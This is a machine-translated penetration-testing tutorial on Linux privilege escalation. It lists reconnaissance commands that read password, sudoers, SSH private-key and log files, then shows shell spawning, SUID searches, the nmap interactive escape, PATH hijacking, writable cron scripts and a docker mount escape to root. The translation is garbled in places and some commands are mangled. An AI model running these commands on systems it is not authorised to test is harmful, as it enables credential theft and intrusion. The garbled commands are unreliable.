Reference link ：https://xz.aliyun.com/t/7924
The essence of penetration is information collection , The first step is to collect information as much as possible . The general idea is to search for available documents through information collection / Script / Software / user / Kernel vulnerability / Malicious hijacking / Platform specific vulnerabilities / Frame loopholes / Components / etc. , Write or execute malicious commands / Script /shell/ Add high privilege users , Mention right to success , And then make further use of .
On the target machine , The general information to be collected is as follows ：

kernel , operating system , Equipment information

uname -a Print all available system information
uname -r Kernel version
uname -n System host name .
uname -m Check out the system kernel architecture （64 position /32 position ）
hostname System host name
cat /proc/version Kernel information
cat /etc/*-release Distribute information
cat /etc/issue Distribute information
cat /proc/cpuinfo CPU Information
cat /etc/lsb-release # Debian
cat /etc/redhat-release # Redhat
ls /boot | grep vmlinuz-

Users and groups

cat /etc/passwd List all users on the system
cat /var/mail/root
cat /var/spool/mail/root
cat /etc/group List all groups on the system
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts
whoami View the current user
w Who is currently logged in , What are they doing
last The list of the last logged in users
lastlog Last login information for all users
lastlog –u %username% Information about the last login of the specified user
lastlog |grep -v "Never" The end of previous login users

User permission information

whoami Current user name
id Current user information
cat /etc/sudoers Who is allowed to use root execute
sudo -l The current user can use root Identity execution operation

environmental information

env Show environment variables
set Real environment variables
echo %PATH Path information
history Display the historical command record of the current user
pwd Output working directory
cat /etc/profile Show default system variables
cat /etc/shells Show available shellrc
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

Processes and services

ps aux
ps -ef
top
cat /etc/services

View to root Running process

ps aux | grep root
ps -ef | grep root

Check the installed software

ls -alh /usr/bin/
ls -alh /sbin/
ls -alh /var/cache/yum/
dpkg -l

service / plug-in unit

Check for unsafe service configuration , And some plug-ins with vulnerabilities .

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^. r./

Planning tasks

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Whether there is clear text to store the user password

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find , -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

Yes no ssh Private key

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

View other users or hosts communicating with the current machine

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

Log files

cat /var/log/boot.log
cat /var/log/cron
cat /var/log/syslog
cat /var/log/wtmp
cat /var/run/utmp
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

Interactive shell

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i

The right to draw SUID && GUID

Reference material https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
for i in locate -r "bin$"; do find $i ( -perm -4000 -o -perm -2000 ) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} ; 2>/dev/null

View writable / Perform directory

find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o w -type d 2>/dev/null # world-writeable folders

find / -perm -o x -type d 2>/dev/null # world-executable folders

find / ( -perm -o w -perm -o x ) -type d 2>/dev/null # world-writeable & executable folders

Check the installed tools

find / -name perl*
find / -name python*
find / -name gcc*
...

With the above information collected as the basis , To facilitate the implementation of specific means of raising rights .

The kernel authorization vulnerability

If the version of the target machine is too low , Kernel vulnerability privilege is the easiest way to think of . because kali Built in exploit-db Local vulnerability of the replica library , have access to searchsploit Command to quickly retrieve kernel version response vulnerability .

By the way, the classic dirty cow loophole ,CVE-2016-5195.
There are some pitfalls in the kernel exploit process , The most obvious is the environmental problem , Because I don't know what the environment on the target machine lacks , Most of the time, it's very smooth to compile and run locally , But there will always be some inexplicable errors on the target machine . And a lot exp It's not very stable , If you are not careful when you raise the right, the target machine will collapse , Therefore, it is better to use the kernel power as the last card .

suid Raise the right

suid The full name is Set owner User ID up on execution. This is a Linux Give an executable a property . Other users can use the program owner when executing the program / Group permissions . It should be noted that , Only the owner of the program is 0 No. or other super user, At the same time suid jurisdiction , Then you can raise your rights .

The following command can find all of the SUID Executable file .

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

such as nmap The old version had a feature , Users can run in interactive mode nmap, And escape to shell. If nmap Set up SUID position , It will take root Permission to run , We can access it through its interaction mode “root”shell.

$ nmap –interactive - function nmap Interactive mode
$ !sh - Allow from nmap shell Escape to the system shell

Environmental variables are weighted

$PATH yes Linux And the class Unix Environment variables in the operating system , It specifies the bin and sbin Catalog . When the user runs any command on the terminal , It is to shell Request , Search for executable files with the help of environment variables in response to user commands . Super users usually have /sbin and /usr /sbin entry , For easy execution of system management commands .
Use echo The command can easily view the environment variables related to the current user .

You need to pay attention to whether the environment variable contains ".", If there is one, it means that binaries are executed preferentially from the current directory / Script . for instance , For example, we all know ls A command is a command that lists the directory file in which it is located , But when we add "." after , And there is an executable in the current directory ls When you file , We're typing on the command line ls The result of the command changes .
Create a new one ls file

Add... To the environment variable "."

Type in the current directory ls command

Visible knock ls What the order is actually "./ls" This command , That is to execute the current directory named ls The executable of .
According to this, we can and have suid Permission of the file combined use , Such as suid Call a system command , You can hijack this command by modifying the environment variable , And construct a malicious file to make the program execute the desired result , Please refer to the link ：https://xz.aliyun.com/t/2767

Plan tasks and raise rights

There may be some scheduled tasks in the system , Generally these tasks are performed by crontab To manage , Have the permissions of the user . Not root Users with permissions are not allowed to list root User's planned task . however /etc/ Planned tasks of internal system can be listed .

ls -l /etc/cron*

Default these programs to root Permissions to perform , If you are lucky to meet an administrator who configures the script to be writable by any user , We can modify the script and wait for the connection rootshell 了 .

Using third party services

Some server services will be configured to be intranet or local . By attacking them we have access to more sensitive documents , Or lucky enough to meet a remote root Loophole .

netstat -antup# Check out a variety of Web Services 

If multiple users use docker In the case of sharing a machine , And the current user has docker Group permissions , You can directly run an image to get the image inside root jurisdiction , To modify the outside of the mirror /etc/passwd Right to come .

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
cat /etc/passwd

docker Inside /etc/passwd And the outside /etc/passwd equally , therefore , You can add a user directly to it . To realize the right of withdrawal .

Other third party software and services can refer to the link ：https://atsud0.me/2020/04/14/...
In addition to the above , There are many more in practical application , For example, direct sudo, Or from shadow I got it in the file hash Crack , Or all sorts of guesses root password . In short, we should sort out the system , Go deep into the essence , Flexible use of .